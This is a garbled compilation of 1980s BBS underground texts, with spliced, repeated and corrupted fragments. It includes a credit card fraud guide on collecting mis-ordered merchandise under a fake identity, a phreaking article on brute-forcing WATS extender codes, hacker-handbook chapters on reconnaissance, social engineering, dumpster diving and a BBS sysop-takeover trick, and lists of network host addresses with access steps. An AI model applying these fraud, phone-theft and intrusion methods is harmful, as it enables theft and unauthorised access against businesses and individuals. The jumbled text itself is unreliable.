MECHANDISE TO YOU'RE ADDRESS, AND WE WILL SEND A SALES REPRESENTATIVE (OR HIS SON) TO COME PICK IT UP." SPICE THIS UP, BY APOLOGIZING FOR ANY HASSLES, AND GIVING A FAKE NAME FOR THE "SALES REPRESENATIVE". THEN, WHEN YOU GO, JUST GIVE THEM A LITTLE NOTE AUTHORIZING YOU TO BE THERE WITH AN IMPRESSIVE SIGNATURE. WHEN YOU PICK UP THE PACKAGE, BE CALM. TALK TO THE PEOPLE NO LONGER THAN NECESSARY, BUT DON'T RUN AWAY OR ANYTHING. WEAR A HAT, BUT DON'T WEAR A SKI MASK AND SUNGLASSES. LOOK NORMAL, YET TRY AND CONCEAL AS MUCH OF YOU'RE LOOKS AS POSSIBLE. IF YOU 4TDO THIS RIGHT, YOU WILL LOOK LIKE A NORMAL PERSON, AND THE PEOPLE WILL FORGET ABOUT YOU IN THE MONTH OR SO IT TAKES THE CREDIT AGENCY TO DO ANYTHING ABOUT THE FRAUD. ADVANCED FRAUD ============== TO ORDER MORE ADVANCED, (IE: FROM NORTHWESTERN, OR THINGS THAT COST ALOT OF MONEY), YOU WILL NEED THE FOLLOWING (USUALLY): THE DRIVER'S LICENSE NUMBER THE BANK OR INTERBANK NUMBER (FOR MASTERCARD) THE BILLING ADDRESSS SOMETIMES THIS WILL BE WRITTEN ON THE CARBON. BUT %U IS QUITE EXPENSIVE TO THE COMPANY. SEVERAL YEARS AGO, SOMEONE CAME UP WITH A NEAT MONEY SAVING IDEA. SINCE THE COMPANY ALREADY HAD AN AN INWATS (800) NUMBER FOR SALESMEN TO CALL IN ORDERS TO THE MAIN PLANT, AND SINCE THE COMPANY HAD A FLAT RATE OUTWATS LINE TO CALL CUSTOMERS DURING THE DAY. WHY NOT COUPLE THEM TOGETHER AFTER HOURS SO THAT THE SALESMAN CALLS THE COMPANIES INWATS 800 NUMBER, THEN GETS CONNECTED UP TO OUTWATS. THIS WOULD MEAN HE COULD CALL ANYWHERE IN THE UNI TED STATES. FROM ANYWHERE AT NO CHARGE TO HIM! THIS ARRANGEMENT WOULD SAVE THE COMPANY TREMENDOUS AMOUNTS OF LONG DISTANCE CHARGES SINCE THEY HAD THE WATS LINES ANYWAY, AND THE WATS WAS A LOT MORE COST EFFICIENT THAN CREDIT CARDS. THIS ARRANGEMENT WAS EXACTLY HOW EARLY "WATS EXTENDERS" WORKED. DURING WATS (800) SCANNING (FOR HOW TO DO THIS, READ "NAPOLEAN SOLO'S" EXCELLENT ARTICLE IN ISSUE 55) PHREAKS DISCOVERED THESE WATS EXTENDERS, AND FOUND THEY COULD CALL ANYWHER @gE IN THE COUNTRY JUST BY CALLING THE EXTENDERS 800 NUMBER, THEN (USING TOUCH TONE OF COURSE) DIAL THE NUMBER THEY WANTED. THE COMPANIES SOON REALIZED THAT THEIR EXTENDERS WERE BEING MESSED WITH AND DECIDED TO ADD SOME SECURITY TO PREVENT TAMPERING. IT WAS SET UP SO THAT WHEN A SALESMAN DIALED THE WATS EXTENDER, HE WOULD HEAR WHAT SOUNDS LIKE A DIAL TONE. THE SALESMAN THEN KEYED IN A FOUR DIGIT TOUCH TONE SECRET ACCESS CODE. IF THE CODE WAS INCORRECT A HIGH-LOW TONE  .MWOULD RESULT, AND THE EXTENDER WOULD HAVE TO BE RE-DIALED. IF THE CODE WAS CORRECT, AND SECOND INTERNAL PBX DIAL TONE WOULD RESULT. THE SALESMAN WOULD THEN ACCESS THE COMPANIES OUTWATS LINE BY HITTING 8 OR 9 (USUALLY) AND DIAL WHEREVER HE WANTED. THE FOUR DIGIT ACCESS CODE POSED A PROBLEM TO PHREAKS SINCE ONLY 1 OUT OF 9999 POSSIBLE CODES WORKED, AND THE 800 NUMBER HAD TO BE RE-DIALED EACH TIME AND TRY ANOTHER. MANY A PHONE PHREAK SPENT LONG NIGHTS BREAKING THE FOUR ` DIGIT CODES AND THEN USING THE EXTENDERS THEMSELVES! MOST COMPANIES CHANGE THE CODE EVERY FEW MONTHS SO THE PHREAKS WOULD HAVE TO START OVER AGAIN. (ALSO COMPANY EMPLOYEES THAT WERE NOT AUTHORIZED TO KNOW, BUT FOUND OUT FROM "LEAKS"). MANY OF YOU HAVE PROBABLY HEARD OF THE INFAMOUS COMPUTER "CHARLIE". FOR THOSE WHO HAVEN'T, SEVERAL YEARS AGO CHARLIE WAS BROUGHT TO LIFE BY CAPN CRUNCE (NOW RETIRED FROM THE COMMUNICATIONS SERVICE) CHARLIE WAS AN APPLE ][ COMPUTER WITH A SPEC `IAL BOARD WHICH ALLOWED IT TO TOUCH TONE DIAL NUMBERS EXTREMELY RAPIDLY (D/A) THEN "LISTEN" TO THE RESULTS (A/D). CHARLIE WAS PUT TO USE CALLING A GIVEN WATS EXTENDER, TRYING AN ACCESS CODE, IF THE HIGH-LOW TONE WAS HEARD (MEANING AN INCORRECT CODE), CHARLIE HUNG UP AND DIALED AGAIN, TRYING THE NEXT SEQUENTIAL CODE. CHARLIE WOULD SIT WORKING FOR HOURS, AND WHEN IT FOUND THE CODE, IT WOULD PRINT IT ON IT'S DISPLAY SCREEN. VERY EFFECTIVE! UNFORTUNATELY THE ONLY PROBLE  M WITH CHARLIE WAS THE HE WAS VERY NOTICEABLE TO BELL. EVERY TIME AN 800 NUMBER IS DIALED, AND AMA RECORD IS PUNCHED AT THE C.O. THUS IT LOOKS REAL PHUNNY TO BELL TO SEE THAT YOU HAVE CALLED DRY DOCK ORANGE SHIPPERS 800 NUMBER IN FLORIDA 3,750 TIMES AT 2:00 AM WITH EACH CALL LASTING 1 SECOND! SINCE CHARLIE WAS NOT VERY EASILY PORTABLE TO PAY PHONES THIS WAS A REAL PROBLEM. THERE ARE MANY WATS EXTENDERS REPORTEDLY PRESENTLY IN SERVICE. MOST WORKING AS DESCRIBED, WITH SOME T 1AKING MORE THAN A FOUR DIGIT CODE, AND SOME EVEN RESPONDING TO VOICE INPUT! IT SHOULD BE POINTED OUT HOWEVER, THAT SHOULD ANY OF YOU CRACK ANY WATS EXTENDER ACCESS CODES AND ATTEMPT TO USE THEM, YOU ARE GULITY OF THEFT OF COMMUNICATIONS SERVICES FROM THE COMPANY WHO OWNS IT, AND BELL IS VERY WILLING AND ABLE TO HELP NAIL YOU! WATS EXTENDERS CAN GET YOU IN EVERY BIT AS MUCH TROUBLE AS A BLUE BOX SHOULD YOU BE CAUGHT. MOST WATS EXTENDERS ALSO RECORD ALL NUMBERS CALL FR eOM THEM ON OUTWATS. IF THE COMPANY DETECTS THE EXTENDER BEING MIS-USED, THEY WILL USUALLY FIRST TRY TO CHANGE THE ACCESS CODE. IF THE ABUSE CONTINUES AND THE GET MAD ENOUGH THEY WILL CONTACT BELL WHO WILL HELP THEM INVESTIGATE ALL THE NUMBERS YOU CALLED! THUS, AS IN MOST THINGS THOSE OF YOU WHO ARE DETERMINED TO PLAY WITH WATS EXTENDERS, DO SO FROM A PAY PHONE AND ONLY TO INSTITUTIONAL SWITCHBOARDS, OR PEOPLE WITH SHORT MEMORIES. BY THE WAY, ON SOME "MONEY FIRST" PAYPHONES  > (AS AS OPPOSED TO "DIAL TONE FIRST") THE TOUCH TONE PAD IS CUT OFF AFTER THE WATS CALL IS COMPLETE. (BECAUSE OF POLARITY REVERSAL) IT CAN BE RE-ACTIVATED BY DEPOSITING A DIME AFTER THE CONNECTION IS MADE, WHICH YOU WILL GET BACK AFTER YOU HANG UP. ALSO PLEASE REMEMBER THE OPENING OF THIS ARTICLE. DO NOT USE WATS EXTENDERS JUST TO MAKE FREE CALLS ALL THE TIME! EXPERIMENT WITH THEM AND LEARN WHAT THEY CAN DO AND HOW THEY WORK. I THINK YOU WILL LEARN A LOT!! ------------- -------------------------- ENTER (1-49, M=MENU, Q=QUIT) :47 --------------------------------------- [CTRL-S PAUSES/SPACE=QUIT] \=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=/ | VOLUME I OF THE ADVENTURES IN FRAUD SERIES | | THE BIBLE OF FRAUD | | BY: | | SNEAK THIEF | | SMOG CITY..213-926-7720 | | nu will draw two conclusions: first that someone seriously interested in illicitly extracting information from the computer would find the readitional techniques of espionage - soborning of MI5 employees by bribery, blackmail or appeal to ideology - infinitely easier than pure hacking; and second, that remarkable detail can be accumulated about machines and systems, the very exsistence of which is supposed to be a secret - and by using purely open sources and reasonable guess-work.  The MI5 databanks and assoicated networks have long been the subject of interest to civil libertarians. Few people would deny absoulutely the need for an internal security service of some sort, nor deny that service the benefit of the latest technology. But, civil libertarians ask, who are the legitimate targets of MI5's activities? If they are 'subversives', how do you define them? By looking at the type of computer power MI5 and its associates possess, it is possible to see if  perhaps they are casting too wide a net for anyone's good. If, as has been suggested, the main installation can hold 20 million records, each containing 150 words, and Britian's total population including children is 56 million, then perhaps an awful lot of individuals are being marked as 'potential subversives'. It was to test these ideas out that two journalists, not themselves out-and-out hackers, researched the evidence upon which hackers have later built. The two writers weiSre Duncan Campbell of New Statesman and Steve Connor, first of Computing and more recently on the New Scientist. The inference works this way: the only computer manufacturer likely to be entrusted to supply so sensitive a customer would be British and the single candidate would be ICL. You must therfore look at their product range and decide which items would be suitable for a really large, secure, real-time database management job. In the late 1970s, the obvious patht was the 2900 sb)beries, possibly doubled up and with substansive rapid-access disc stores of the type EDS200. Checking through back issues of trade papers it is possible to see that just a configuration, in fact a dual 2980 with a 2960 as back-up and 20 gigabytes of disc store, were ordered for classified database work by 'the Ministry of Defence'. ICL, on questioning by the journalists, confirmed that they had sold 3 such large systems, two abroad and one for a UK government department. Caӝmpbell and Connor were able to establish the site of the computer, in Mount Row, Londow W1, and, in later stories, gave more details, this time obtained by a careful study of advertisements placed by two recruitment agencies over several years. The main computer, for example, has several minis attached to it, and at least 200 terminals. The journalists later went on the investigate details of the network - connections between National Insurance, Department of Health, pilce and vehicl e riving license systems. In fact, at a technical level, and still keeping to open sources, you can build up even more detailed speculations about the MI5 main computer. ICL's communications protocols, CO1, CO2, CO3, are published items; you can get terminal emulators to work on a PC, and both the company and its employees have published accounts of their approaches to database management systems, which, incidently, integrate software and hardware functions to an unusually high!ZP degree, giving speed but also a great deal of security at fundamental operating system level. Reseaching MI5 is an extreme example of what is possible; there are few computer installations of which it is in the least difficult to assemble an almost complete picture. ---- End of Chapter 5 ---- security at fundamental operating system level. Reseaching MI5 is an extreme example of what is possible; there are few computer installations of which it is in the least difficult "ir7to assemble an almostems. In fact, at a technical level, and still keeping to open sources, you can build up even more detailed speculations about the MI5 main computer. ICL's communications protocols, CO1, CO2, CO3, are published items; you can get terminal emulators to work on a PC, and both the company and its employees have published accounts of their approaches to database management systems, which, incidently, integrate software and hardware functions to an unusually high^ WHERE A BLUE BOX WILL WORK ARE RAPIDLY DECREASING, AND WITHIN SEVERAL YEARS THE BOX WILL BE TOTALLT OBSOLETE. THUS FOR THEIR COMMUNICATIONS NEEDS, PHREAKS HAVE TURNED TO OTHER METHODS, ONE BEING: WATS EXTENDERS. MANY COMPANIES THROUGHOUT THE UNITED STATES HAVE A SALESMAN IN THE FIELD THAT MUST CONTACT A LARGE AMOUNT OF CUSTOMERS LONG DISTANCE BY PHONE. TO PAY FOR THESE CALLS, GENERALLY THE SALESMAN USE THE COMPANIES BELL CREDIT CARD (NOW CALLED A "CALLING CARD") THIS$mCASIONALLY THIS EXPERIMENTING, AND A NEED TO COMMUNICATE WITH OTHER PHREAKS (WITHOUT GOING BROKE), LEADS TO FREE CALLS. THE FREE CALLS ARE BUT A SMALL SUBSET OF A TRUE PHONE PHREAKS ACTIVITIES. UNTIL SEVERAL YEARS AGO, THE PHREAKS MAIN TOOL FOR FREE CALLS WAS THE BLUE BOX. IN RECENT YEARS HOWEVER, BELL HAS MADE GREAT STRIDES IN THEIR SECURITY AND DETECTION OF BLUE BOX'S. WHILE BOX'S STILL WORK, THEIR USE IS BECOMING EXTREMELY DANGEROUS. WITH THE ADVENT OF CCIS, THE PLACESx_ month - together with invitations to expensive conferences in far-off climes. Do not be put off by the notion that free magazines must be garbage. In the computer industry, as in the medical world, this is absolutely not the case. Essential regular reading for hackers are COMPUTING, COMPUTER WEEKLY, SOFTWARE, DATALINK, COMMUNICATE, COMMUNICATIONS MANAGMENT, DATAMATION, MINI-MICRO SYSTEMS, AND TELECOMMUNICATIONS. The articles and news items often contain information of use to ha ڼCLckers: who is installing what, where; what sort of facilities are being offered; what new products are appearing and what features they have. Sometimes you will find surveys of sub-sets of the computer industry. Leafing through the magazine pile that has accumulated while this chapter was written, I have marked for special attention a feature on Basys Newsfury, an electronic newsroom package used, among others, by ITNs Channel Four News; several articles on new on-line hosts; an expl!wanation of new enhanced Reuters services; a comparison of various private viewdata spftware packages and who is using them; some puffs for new Valued Added Netwroks (VANs); severla pieces on computer security; news of credir agencies selling on-line and via viewdata; and a series on Defence Data Networks. In most magazines, however, this is not all: each advertisement is coded with a number which you have to circle on the tear-out post-paid 'bingo-card': each one you mark will b"%ring wads of useful information: be careful, however, to give just enough information about yourself to ensure that postal packets arrive and not sufficient to give the 'I was just passing in the neighbourhood and though I would call in to see if I could help' sales rep a 'lead' he thinks he can exploit. Another excellent source of information are exhibitions: there are the ubiquitous 'product information' sheets, but also the actual machines and software to look at maybe play w#̨|ith: perhaps you can even get a full scale demonstration and interject a few questions. The real bonus of exhibitions, of course, is that the security sense of salespersons, exhausted by performing on a stand for several days and by the almost compulsory off-hours entertainment of top-clients or attempted seduction of the hired-in-'glamour' is rather low. Passwords are often written down on paper and consulted in your full view. All you need is a quick eye and a reasonable memory. $Jp, At both exhibitions and conferences it is a good idea to be a freelance journalist. Most computer mahs have relatively small full-time staff and rely on freelancers, so you won't be thought odd. And you'll have your questions answered without anyone asking 'And how soon do you think you'll be making a decision?' Sometimes the lack of security at exhibitions and demonstrations defies belief. When ICL launched its joint venture product with Sinclair, the One-Per-Desk communicat%w ing executive workstations, it embarked on a modest road-show to give hands-on experience to prospective purchasers. The demonstration models had been pre-loaded with phone numbers ... of senior ICL directors, of the ICL mainframe at its headquarters in Putney and various other remote services .... Beyond these open sources of information are a few murkier ones. The most important aid in tackling a 'diffidult' operating system or applications program is the proper documentation:&5 this can be obtained in a variety of ways. Sometimes a salesman may let you look at a manual while you 'help' him find the bit of information he can't remember from his sales training. Perhaps an employee can provide a 'spare' , or run you a photocopy. In some cases, you may even find the manual stored electronically on the system; in which case, print it out. Another desirable document is an organisation's internal phone book ... it may give you the numbers for the computer ports, 'iq&but failing that, you will be able to see the range of numbers in use and, if you are using an auto-dial modem coupled with a search-and-try program, you will be able to define the search parameters more carefully. A phone book will also reveal the names of computer managers and system engineers; perhaps they use fairly obvious passwords. It never ceases to astonish me what organisations leave in refuse piles without first giving them a session with the paper shredder. I keep my(? cuttings carefully stored away in a second-hand filing cabnet; items that apply to more than one interest area are duplicated in the photocopier. INFERENCE But hackers' research doesn't rely simply on collecting vast quantities of paper against a possible use. If you decide to target on a particular computer or network, it is surprising what can be found out with just a little effort. Does the organisation that owns the system publish any information about it. In a handbook, annual ~report, house magazine? When was the hardware and software installed? Did any of the professional weekly computer mags write it up? What do you know about the hardware, what sorts of operating systems would you expect to see, who supplied the software, do you know anyone with experience of similar systems, and so on. By way of illistration, I will describe certain inferences it is reasonable to make about the principal installation used by Britian's Security, MI5. At the end, yo*q breaks at computer clubs, huge quantities of useful literature are published daily by the marketing departments of computer companies and given away to all comers: sheaves of stationary and lorry loads of interal documentation containing important clues are left around to be picked up. It is up to the hacker to recognise this treasure for what it is, and to assemble it in a form in which it can be used. Anyone who has ever done any intelligence work, not necessarily for a gover+nment, but for a company, or who has worked as an investigative journalist, will tell you that easily 90% of the information you want is freely available and that the difficult part is recognising and analysing it. Of the remaining 10%, well over half can usually be inferred from the material you already have, becuase, given a desired objective, there are usually only a limited number of sensiblr solutions. You can go further: it si often possible to test your inferences and, having ,m! done that, develop further hypotheses. So the dedicated hacker, far from spending all the time staring at a VDU and 'trying things' on the keyboard, is often to be found wandering around exhibitions, attending demonstrations, picking up literature, talking on the phone (voice-mode!) and scavenging in refuse bins. But for both the trivial operator, and the dedicated hacker who wishes to consult with his colleagues, the bulletin board movement has been the single greatest source o-w f intelligence. BULLETIN BOARDS Since 1980, when good software enabling solitary micro-computers to offer a welcome to all callers first became widely available, the bulletin board movement has grown by leaps and bounds. If you haven't logged on to at least one already, now is the time to try. At the very least it will test out your computer, modem, and software - and your skills ins handling them. Current phone numbers, together with system hours and comms. protocol requirements, ar.@Le regularly published in computer mags; once you have got into one, you will usually find current details of most of the others. Somewhere on most boards you will find a series of Special Interest Group (SIG) sections and among these, often, will be a Hacker's Club. Entrance to each SIG will be at the discretion of the Sysop, the Bulletin Board owner. Since the BBS software allows the Sysop to conceal from users the list of possible SIGs, it may not be immediately obvious whethe /.ާMr a Hacker's section exists on a particular board. Often the Sysop will anxious to form a view of the new entrant before admitting him or her to a 'sensitive' area. It has even been known for bulletin boards to carry two hacker sections: one, admission to which can be fairly easy to obtain; and a second, the very existence of which is a tightly-controlled secret, where mutually trusting initiates swap information. The first timer, reading through a hacker's bulletin board, will  0find that it seems to consist of a series of discursive conversations between friends. _ccasionally, someone may write up a summary for more universal consumption. You will see questions being posed .. if you fell you can contribute, do so, because the whole idea is that a BBS is an information exchange. It is considered crass to appear on a board and simply ask 'Got any good numbers??"; if you do, you will not get any anwsers. Any questions you ask should be highly specific, show th 1PNat you have already done some ground-work, and make clear that any results derived from the help you recieve will be reported back to the board. Confidential notes to individuals, not for gerneral consumption, can be sent using the E-mail option on the bulletin board, but remember, NOTHING is hidden from the Sysop! It is probably bad taste to mention it, but of course people try to hack bulletin boards as well. An early version of one of the most popular packages could be h 2Yksacked simply by sending two semi-colons (;;) when asked for your name. The system allowed you to become the Sysop, even though you were sitting at a different computer; you could access the user files, complete with all password, validate or devalidate whomever you liked, destroy mail, write general notices, and create whole new areas ... RESEARCH SOURCES The computer industry has found it necessary to spend vast sums on marketing its products and whilst some of that effort is devote 3Wzd to 'image' and 'concept' type advertising - to making senior management comfortable with the idea of the XXX Corporation's hardware because it has 'heard' of it - much more is in the form of detailed product information. This information surfaces in glossies, in conference papers, and in magazine journalism. Most professional computer magazines are given away on subscription to 'qualified' readers; mostly the publisher wants to know if the reader is in a position to influence !a key buying decision - or is looking for a job. I have never had any difficulty in being regarded as qualified: certainly no one ever called round to my address to check up the size of my mainframe installation or the number of employees. If in doubt, you can always call yourself a consultant. Registration is usually a matter of filling in a post-paid card. My experience is that, once you are on a few subscription lists, more magazines, unasked for, tend to arrive every week or5*ph lines. The user could only watch, and 'interrogation' consisted on back-tracking along the tape of paper. Extel (Exchange Telegraph) continues to use this technique, though it is gradually upgrading by using viewdata and intelligent terminals. However, just over ten years ago Reuters put together the first packages which gave some intelligence and 'questioning power' to the end user. Each Reuters' Monitor is intelligent, containing (usually) a DEC PDP-8 series mini and some f6_0irmware which accepts and selects the stream of data from the host at the far end of the leased line, marshalls interrogation requests and takes care of the local display. Information is formatted in 'pages' rather like viewdata frames, but without the colour. There is little point in eavesdropping into a Reuters line unless you know what the terminal software does. Reuters now face an agressive rival in Telerate, and the fight is on to deliver not only fast conprehensive price serv7hTices but international screen-based dealing as well. The growth of Reuters and its rivals is an illustraion of technology creating markets - especially in international currency - where none existed before. The first sophisticated Stock Exchange prices 'screens' used modified closed circuit television technology. London had a system called Market Price Display Service - MPDS - which consisted of a number of tv displays of current prices services on different 'channels' which cou8Pld be selected by the user. But \ondon now uses TOPIC, a leased line variant on viewdata technology, though with its magazine-like arrangement and auto-screen refresh, it has as much in common with teletext as Prestel. TOPIC carries about 2,500 of the total 7,500 shares traded in London, plus selected analyitical material from brokers. Datastream represents a much higher level of sophistication: using in 40,000 pounds plus pa terminals you can compare historic data - price movements,9 movements against sector indices etc - and chart results. The hacker's reward for getting into such systems is that you can see share and other prices on the move. None of these prices is confidential; all could be obtained by ringing a stockbroker. However, this situation is likely to change; as the City makes the change from traditional broker/jobber method of dealing towards specialist market making, there will then be electronic prices services giving privileged information:K\j to specialist share dealers. All these services are only available via leased line; City professionals would not tolerate the delays and uncertainties of dial-up facilities. However dial-up ports exist for demonstrations, exhibitions, engineering and as back-up - and a lot of hacking efort has gone into tracking them down. In the United States, in addition to Reuters, Telerate and local equivilants of offical streams of stock exchange and over-the-counter data, tere is Dow;Y Jones, best known internationally for its market indices similar to those produced by the Financial Times in London. Dow Jones is in fact the owner of the Wall Street Journal and some influencial business magazines. Its Dow Jones News/Retrieval Service is aimed at businesses and private investors. It features current chare prices, deliberately delayed by 15 minutes, historic price data, which can be charted by the user's own computer (typically an Apple or IBM PC) and historic 'morgue dirty secrets of hacking: there are really two sorts of hacker. For this purpose I will call them the trivial and the dedicated. Anyone can become a trivial hacker: you acquire, from someone else, a phone number and a password to a system; you dial up, wait for the whistle, tap out the password, browse around for a few minutes and log off. You've had some fun, perhaps, but you haven't really done anyhing except follow a well-marked path. Most unauthorised computer invasions are act)ually of this sort. The dedicated hacker, by contrast, makes his or her own discoveries, or builds on those of other pioneers. The motto of dedicated hackers is modified directly from a celecrated split infinitive: to boldy pass where no man has hacked before. Sucessful hacking depends on good research. The material of research are all around: as well as direct hacker-oriented material of the sort found on bulletin board systems and heard in quiet corners during refreshment@ %Uand then goes on-line via an auto-dial modem to extract the information as swiftly and efficiently as possible. On-line services require the use of a whole series of passwords: the usual NUI and NUA for PSS (see chapter 7), another to reach the host, yet another for the specific information service required. Charges are either for connect-time or per record retrieved, or sometimes a combination. The categories of on-line service include bibliographics, which merely indexes  As!the exsistence of an article or book - you must then find a physical copy to read; and source, which contains te article or extract thereof. Full-text services not only contain the complete article or book but will, if required, search the entire text (as opposed to mrere keywords) to locate the desired information. An example of this is LEXIS, a vast legal database which contains nealy all important US and English law judgements, as well as statutes. NEWS SERVICES. The vast majority B' of news services, even today, are not, in the strictest sense, computer-based, although computers play an important role in assembling the information and, depending on the nature of the newspaper or radio or tv station receiving it, its subsequent handling. The world's big press agencies - United Press, Associated Press, Reuters, Agence France Presse, TASS, Xinhua, PAP,VoA - use telex techniques to broadcast their stories. Permanent leased telegraphy lines exist between agencies an C^rd customers, and the technology is pure telex: the 5-bit Bauddot code (rather than ASCII) is adopted, giving capital letters only, and 'mark' and 'space' are sent by changing the voltage on the line rather than audio tones. Speeds are 50 or 75 baud. The user cannot interrogate the agency in any way. The stories come in a single stream which is collected on rolls of paper and then used as per the contract between the agency and subscriber. To hack a news agency line you will Da) need to get physically near the appropriate leased line, tap in by means of an inductive loop, and convert the changing voltage levels (+/- 80 volts) into something your RS-232 can handle. You will then need software to translate the Baudot code into the ASCII which your computer can handle internally, and display on screen or print to a file. The Baudot code is given in Appendix IV. None of this is easy and will probably involve breaches of several laws, including theft of cop E yright material! However a number of news agencies also transmit services by radio, in which case the signals can be hijacked with a short-wave receiver. Chaper 9 Explains. Historic news, as opposed to the current stuff from agencies, is now becoming available on-line. The New York Times, for example, has long help its stories in an electronic 'morgue' or clippings library. Initially this was for internal use, but for the last several years it has been sold to outsiders, chieflyF8 broadcasting stations and large corporations. You can search for information by a combination of keyword and date-range. The New York Times Information Bank is available through several on-line hosts. As the world's great newspapers increasingly move to electronic means of production - journalists working at VDUs, sub-editors assembling pages and direct-input into photo-typesetters - the additional cost to each newspaper of creating its own morgue is relatively slight and we cGaan expect to see many more commercial services. In the meantime, other publishing orgranisations have sought to make available articles, extracts or complete, from leading magazines also. Two UK examples are Finsbury Data Services' Textline and Datasolve's World Reporter, the later including material from the BBCs monitoring service, Associated Press, the Economist and the Guardian. Textline is an abstract service, but World Reporter gives the full text. In October 1984 it alreaHkdy held 500 million English words. In the US there is NEXIS, which chares resources with LEXIS; NEXIS help 16 million full text articles at the same date. All these services are expensive for casual use and are accessed by dial-up using ordinary asynchonous protocols. Many electronic newsrooms also have dial-in ports for reporters out on the job; depending on the system these ports not only only the reporter to transmit his or her story from a portable computer, but may also (lIwike Basys Newsfury used by Channel Four News) let them see news agency tapes, read headlines and send electronic mail. Such systems have ben the subject of considerable hacker speculation. FINANCIAL SERVICES The financial world can afford more computer aids than any other non-governmental sector. The vast potential profits that can be made by trading huge blocks of currency, securities or commodities - and the extraordinary advantages that a slight 'edge' in information can bring - h4ӆave meant that the City, Wall Street and the equivilants in Hong Kong, Japan and major Eiropean capitals have been in the forefront of getting the most from high-speed comms. Ten year ago the sole form of instant financial information was the tiker tape - telegraphy technology delivering the latest share price movements in a highly abbreviated form. As with its news equivalents, these were broadcast services (and still are, for the services still exist) sent along leased telegraKzINTERACTIVE(GAITHERSBURG) C 30135 C 30136 > C 30138-SOURCE SYSTEM 11 > C 30147-SOURCE SYSTEM 12 C 30155-NEWSNET 75 C 30320-COMPUTER SHARING SERVICES C 30330-COMPUTER SHARING SERVICES C 30335 C 30337-PRIMENET C 30339-PRIMENET C 30340-PRIMENET > C 303125 C 30520 C 30522 C 30531 C 30532-C.S.I. TIMESHARING SERVICE C 30523-C.S.I. TIMESHARING SERVICE C 31231-C.I.C. TIMESHARING C 31232 C 31233-CREDIT INFORMATION CORP. C 31235 C 31236 C 31240 C 312L)43-TRAVENOL SYSTEM A C 31244-TRAVENOL SYSTEM B C 31247 C 31248 C 31249 C 31250-AMERICAN HOSPITAL SUPPLY C 31254 C 31279 C 31289 C 312124 + C 312127 C 31325 C 31327 C 31340-ADP NETWORK C 31341-ADP NETWORK C 31345-PRIMENET C 31359-GENERAL MOTORS WARREN C 31360-GENERAL MOTORS WARREN C 31361-GM PARTS C 31363-VM/370 ONLINE > C 31370-GM DECSYSTEM-20 TIMESHARING C 31422 C 31423 C 31424-MCAUTO VM/370 ONLINE C 31425-MCAUTO VM/370 ONLINE C 31426 M C 31432 C 31435-PRIMENET C 31444 C 31726-RSTS V06C-04 C 40420 C 40434 C 40822 C 41527-STANFORD IBM-3033A C 41556 > C 41560 C 41561 C 41562 C 41567 C 41580-HARPER GROUP INFORMATION NETWORK C 41587-BUSSIPLEXER C 51632 C 51633 C 51634 C 51638 C 51646 C 51647 VM/370 ONLINE C 51729 C 60320-DARTMOUTH COLLEGE COMPUTING C 60322 C 60324 C 60328 C 60331 + C 60720 C 60942 + C 60945 C 61114 C 61115 C 61118 C 61120 C 61221 C 617138ND-<-=- TRY THIS -=-> C 61724 C 61735-(TYPE D FOR SYSTEM) APPLIED LOGIC NETWORK CONTROL C 61748-PRIMENET > C 61750-PRIMENET >>>>>>>>>> American Express <<<<<<<<<<< Through Midas you can connect to the American Express computer, but unfortunately, you can only have a look around! (It is a demo password only!). Connection would be like: MIDAS *(logon here) > 3110 <---- Code for Telenet system (U.S.A) @ C21288 Then you will be connected to the AmerEMican Express computer. From the command prompt, you type 'INFORMATION' and away you go... -=*=-=*=-=*=-= THE END =-=*=-=*=-=*=- C 41560 C 41561 C 41562 C 41567 C 41580-HARPER GROUP INFORMATION NETWORK C 41587-BUSSIPLEXER C 51632 C 51633 C 51634 C 51638 C 51646 C 51647 VM/370 ONLINE C 51729 C 60320-DARTMOUTH COLLEGE COMPUTING C 60322 C 60324 C 60328 C 60331 + C 60720 C 60942 + C 60945 C 61114 C 61115 C 61118 C 61120 C 61221 C 617138?kens special courses. Originally on-line hosts were accessed by dumd-terminals, usually teletypewriters like the Texas Whisperwriter portable with built-in acoustic modem, rather than than by VDUs. Today the trend is to use 'front-end' intelligent software on an IBM PC which allows the naive user to pose his/her questions informally while offline; the software then redefines the information request into the formal language of the on-line host (the user does not witness this process) Q_`full of blank spaces and confounded with myth. In this chapter I am attempting to provide a series of notes on the main types of services potentially available on dial-up, and to give some idea of the sorts of protocols and conventions employed. The idea is to give voyagers an outline atlas of what is interesting and possible, and what is not. ON-LINE HOSTS On-line services were the first form of electronic publishing: a series of big storage computers - and on occasion, associaRO5ted dedicated networks - act as hosts to a group of individual databases by providing not only mass data storage and the approproate 'search language' to access it, but also the means for registering, loggind and billing users. Typically, users access the on-line hosts via a phone number which links into a public data network using packet switching (there's more on thse networks in chapter 7). The on-line business began almost by accident; large corporations and institutions invSuE6olved in complicated technological developments found that their libraries simply couldn't keep track of the publications of relevant new scientific papers, and decided to maintain indices of the papers by name, author, subject-matter, and so on, on computer. One of the first of these was the araments and aircraft company, Lockheed Corporation. In time the scope of these indices expanded and development and outsiders - sub-contractors, research agencies, universities, governmentTEk employees, etc were granted access. Other organisations with similar information-handling requirements asked if space could be found on the computer for their needs. Eventually Lockheed and others recognised the begginnings of a quite seperate business; in Lockheed's case it lead to the foundation of Dialog, which today acts as host and marketing agent for almost 300 seperate databases. Other on-line hosts include BRS (Bibliohraphic Retrieval Serives), Comshare (used for sophisticatOed financial modelling), Datastar, Blaise (British Library), I P Sharp and Euronet-Diane. On-line services, particularly the older ones, are not especially user-friendly by modern standards. They were set-up at a time when both core and storage memory was expensive, and the search langauges tended to be abbreviated and formal. Typically they are used, not by the eventual customer for the information, but by professional intermediaries - librarians and the like - who have undertaV% 1200/1200 (02) 20993 1200/75 *NOTE* Even though these are (02) numbers, they are a FREE call! (Listen when you call... in some areas, there are no STD beeps...) When you get a carrier, connect, and type a few '=' signs until you get 'MIDAS'. Then you have to logon, but I have no password! Once in, you can select many systems. Below is a short list: MIDAS *(login here) > (here you type one of the following DNIC's) COUNTRY NETWORK W DNIC ---------------------------------- Australia Austpac 5052 " Midas 5053 Austria Radio-Austria 2329 " Datex-P 2322 Belgium DCS 2062 Canada Teleglobe 3023 " Datapac 3020 " Infoswitch 3029 Finland Datapak 2442 France Transpac 2080 " NTI 2081 Germany Datex-P 2624 Hong Kong Idas 4542 " X0 " Das 4544 Japan Venus/P 4408 " DDX/P 4401 Luxemburg Luxpac 2704 New Zealand Pacnet 5301 Norway Norpak 2422 Singapore Telepac 5252 South Africa Saponet 6550 Sweden Telepak 2405 Switzerland Telepac 2284 " Datalink 2289 U.K. 